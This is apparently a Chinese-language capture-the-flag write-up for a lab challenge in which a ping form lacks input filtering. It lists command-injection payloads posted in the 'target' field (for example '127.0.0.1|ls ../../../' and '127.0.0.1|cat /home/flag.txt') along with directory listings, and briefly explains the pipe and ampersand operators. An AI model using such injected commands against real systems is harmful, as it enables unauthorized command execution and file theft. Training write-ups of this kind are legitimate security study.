一打开网站,就看到下面这句话
小宁写了个ping
功能,但没有写waf
,X
老师告诉她这是非常危险的,你知道为什么吗。
在框框里面输
127.0.0.1
有反应,看了一下,返回的数据,感觉是linux
用ls
,看一下。
可以,那就是linux
,
(后面用dir
,发现也可以)
反正是可以执行,无所谓了,
先查找文件,用hackbar
target=127.0.0.1|find / -name flag.txt
找到了,/home/flag.txt
去找他们在那个目录,
用ls去查一下有什么文件
127.0.0.1|ls
得到
index.php
换hackbar
,
http://111.200.241.244:65287/ Post data target=127.0.0.1|ls ../
得到html
target=127.0.0.1|ls ../../
得到
backups、cache、lib、local、lock、log、mail、opt、 run、spool、tmp、www
target=127.0.0.1|ls ../../../
bin、boot、dev、etc、home、lib、lib64、media、mnt、 opt、proc、root、run、run.sh、sbin、srv、sys、tmp、 usr、var
找到了,直接去访问,
target=127.0.0.1|ls ../../../home
flag.txt
target=127.0.0.1|cat ../../../home/flag.txt
获得flag
。
(后面发现直接访问,也可以,尴尬,target=127.0.0.1|cat /home/flag.txt
)
基础知识:
| //显示B的执行结果
& //简单拼接,A B之间无制约关系
这题&
用不了。